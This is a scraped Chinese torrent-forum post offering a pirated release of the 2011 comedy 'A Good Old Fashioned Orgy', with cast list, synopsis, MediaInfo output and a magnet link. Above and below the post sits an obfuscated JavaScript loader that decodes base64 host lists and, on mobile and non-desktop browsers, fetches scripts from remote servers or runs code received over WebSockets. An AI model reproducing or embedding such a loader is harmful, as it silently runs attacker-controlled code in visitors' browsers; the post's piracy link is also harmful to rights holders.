怀旧范儿的狂欢节[双语字幕].A.Good.Old.Fashioned.Orgy.2011.Unrated.1080p.BluRay.x265.10bit.FLAC.MNHD 7.80GB

版主小s 28天前 197

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 怀旧范儿的狂欢节

◎片 名 A Good Old Fashioned Orgy

◎年 代 2011

◎产 地 美国

◎类 别 喜剧

◎语 言 英语

◎上映日期 2011-09-02(美国)

◎IMDb链接 https://www.imdb.com/title/tt1231586/

◎豆瓣评分 5.6/10 (1063人评价)

◎豆瓣链接 https://movie.douban.com/subject/3158436/

◎片 长 95分钟

◎导 演 亚历克斯·格瑞格里 Alex Gregory (id:1310718)

皮特·海克 Peter Huyck (id:1287231)

◎编 剧 亚历克斯·格瑞格里 Alex Gregory (id:1310718)

皮特·海克 Peter Huyck (id:1287231)

◎演 员 莱丝莉·比伯 Leslie Bibb (id:1040520)

林赛·斯隆 Lindsay Sloane (id:1022592)

蕾克·贝尔 Lake Bell (id:1000020)

林·沙烨 Lin Shaye (id:1276530)

威尔·福特 Will Forte (id:1019039)

杰森·苏戴奇斯 Jason Sudeikis (id:1049521)

米歇尔·博斯 Michelle Borth (id:1022748)

尼克·克罗尔 Nick Kroll (id:1321396)

Lauren Crawford (id:1272747)

Aaron Pushkar (id:1269033)

Luka Apt (id:1268535)

威廉·哈钦斯 William Hutchings (id:1267361)

Jason Ciok (id:1244498)

克里斯汀·梅利安 Kristin Mellian (id:1240993)

乔·蒙坦蒂 Joe Montanti (id:1230288)

安吉拉·萨拉弗安 Angela Sarafyan (id:1213058)

露茜·彭奇 Lucy Punch (id:1013922)

马丁·斯塔尔 Martin Starr (id:1022628)

瑞斯·考罗 Rhys Coiro (id:1032074)

泰勒·莱伯恩 Tyler Labine (id:1048171)

大卫·科恩查内 David Koechner (id:1049670)

唐·约翰逊 Don Johnson (id:1054900)

Jack Landry Jack Landry (id:1112560)

拉姆·伯格曼 Ram Bergman (id:1278446)

克里斯托弗·佩泽尔 Christopher Petzel (id:1023789)

Jane Antonia Cornish Jane Antonia Cornish (id:1034072)

帕特里克·J·多恩·维托 Patrick J. Don Vito (id:1408353)

托尼·尼克内贾迪 Tony Niknejadi (id:1201719)

◎标 签 喜剧 / 美国 / 2011 / 情色 / 文艺 / 剧情 / 友谊,性,自信,偶尔的放纵,缓解压力,羡慕!!! / Sex

◎简 介

在富豪老爹的豪宅里,三十岁的埃里克(杰森·苏戴奇斯 Jason Sudeikis 饰)过着衣食无忧的生活,趁着老爹不在家,他还会召集狐朋狗友们举办疯狂的派对,派对俨然成为了埃里克生命中不可分割的一部分。

突然有一天,这样惬意的生活走到了尽头,老爹告诉埃里克,他要把豪宅卖掉。为了纪念曾经的生活,埃里克决定在豪宅中举办最后一次派对,这一消息让埃里克的朋友们个个蠢蠢欲动,每一个人都将生命中的种种希望寄托于这场空前盛大的狂欢节中。与此同时,为了能够尽可能长时间的将房子留在手中,埃里克开始和负责此宗买卖的房产经纪人凯丽(莱丝莉·比伯 Leslie Bibb 饰)约会,令埃里可没有想到的是,自己竟然陷入了凯丽的温柔乡中无法自拔。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 267725297347830341920034444015473058089 (0xC96A0446A977C71DC6E7679E1B68E129)

  4. Complete name : A.Good.Old.Fash[email protected]BBQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 7.80 GiB

  8. Duration : 1 h 34 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 11.8 Mb/s

  11. Movie name : A.Good.Old.Fash[email protected]BBQDDQ.COM

  12. Encoded date : UTC 2021-10-31 11:47:35

  13. Writing application : mkvmerge v61.0.0 ('So') 64-bit

  14. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  15. Video

  16. ID : 1

  17. Format : HEVC

  18. Format/Info : High Efficiency Video Coding

  19. Format profile : Main [email protected]@High

  20. Codec ID : V_MPEGH/ISO/HEVC

  21. Duration : 1 h 34 min

  22. Bit rate : 10.6 Mb/s

  23. Width : 1 920 pixels

  24. Height : 1 040 pixels

  25. Display aspect ratio : 1.85:1

  26. Frame rate mode : Constant

  27. Frame rate : 24.000 FPS

  28. Color space : YUV

  29. Chroma subsampling : 4:2:0

  30. Bit depth : 10 bits

  31. Bits/(Pixel*Frame) : 0.220

  32. Stream size : 6.97 GiB (89%)

  33. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit

  34. Encoding settings : rc=crf / crf=21.0000 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=160000 / vbv-bufsize=160000 / vbv-init=0.9 / min-vbv-fullness=50.0 / max-vbv-fullness=80.0 / crf-max=0.0 / crf-min=0.0 / no-lossless / no-cu-lossless / aq-mode=1 / aq-strength=1.00 / cbqpoffs=-2 / crqpoffs=-2 / ipratio=1.30 / pbratio=1.20 / psy-rd=1.50 / psy-rdoq=1.00 / deblock=-3:-3 / ref=6 / limit-refs=0 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=1 / max-keyint=250 / rc-lookahead=100 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=32 / min-cu-size=8 / me=3 / subme=7 / merange=57 / rdoq-level=2 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / no-cutree / no-sao / no-rect / no-amp / no-open-gop / wpp / pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=4 / tu-intra-depth=4 / limit-tu=0 / qg-size=8 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=3 / numa-pools=12 / log-level=2 / input-csp=1 / input-res=1920x1040 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / no-aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / tskip / max-merge=5 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=0 / no-early-skip / no-rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  35. Default : Yes

  36. Forced : No

  37. Color range : Limited

  38. Color primaries : BT.709

  39. Transfer characteristics : BT.709

  40. Matrix coefficients : BT.709


  41. Audio

  42. ID : 2

  43. Format : FLAC

  44. Format/Info : Free Lossless Audio Codec

  45. Codec ID : A_FLAC

  46. Duration : 1 h 34 min

  47. Bit rate mode : Variable

  48. Bit rate : 1 248 kb/s

  49. Channel(s) : 6 channels

  50. Channel layout : L R C LFE Ls Rs

  51. Sampling rate : 48.0 kHz

  52. Frame rate : 11.719 FPS (4096 SPF)

  53. Bit depth : 24 bits

  54. Compression mode : Lossless

  55. Stream size : 844 MiB (11%)

  56. Writing library : libFLAC 1.2.1 (UTC 2007-09-17)

  57. Language : English

  58. Default : Yes

  59. Forced : No


  60. Text

  61. ID : 3

  62. Format : UTF-8

  63. Codec ID : S_TEXT/UTF8

  64. Codec ID/Info : UTF-8 Plain Text

  65. Duration : 1 h 33 min

  66. Bit rate : 178 b/s

  67. Count of elements : 1819

  68. Stream size : 122 KiB (0%)

  69. Title : CHS&ENG

  70. Language : English

  71. Default : Yes

  72. Forced : No


  73. Menu

  74. 00:00:00.000 : Chapter 01

  75. 00:04:44.041 : Chapter 02

  76. 00:10:11.208 : Chapter 03

  77. 00:16:06.250 : Chapter 04

  78. 00:19:08.833 : Chapter 05

  79. 00:25:19.083 : Chapter 06

  80. 00:31:05.291 : Chapter 07

  81. 00:36:12.125 : Chapter 08

  82. 00:41:31.666 : Chapter 09

  83. 00:46:51.208 : Chapter 10

  84. 00:51:29.833 : Chapter 11

  85. 00:57:37.916 : Chapter 12

  86. 01:03:06.333 : Chapter 13

  87. 01:07:50.375 : Chapter 14

  88. 01:12:58.250 : Chapter 15

  89. 01:17:53.958 : Chapter 16

  90. 01:22:31.666 : Chapter 17

  91. 01:30:01.833 : Chapter 18




复制代码


TAGS 喜剧

磁力链:
  • magnet:?xt=urn:btih:9D877E9D0FEF27C475FB476DB0535F42607DDBEB

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};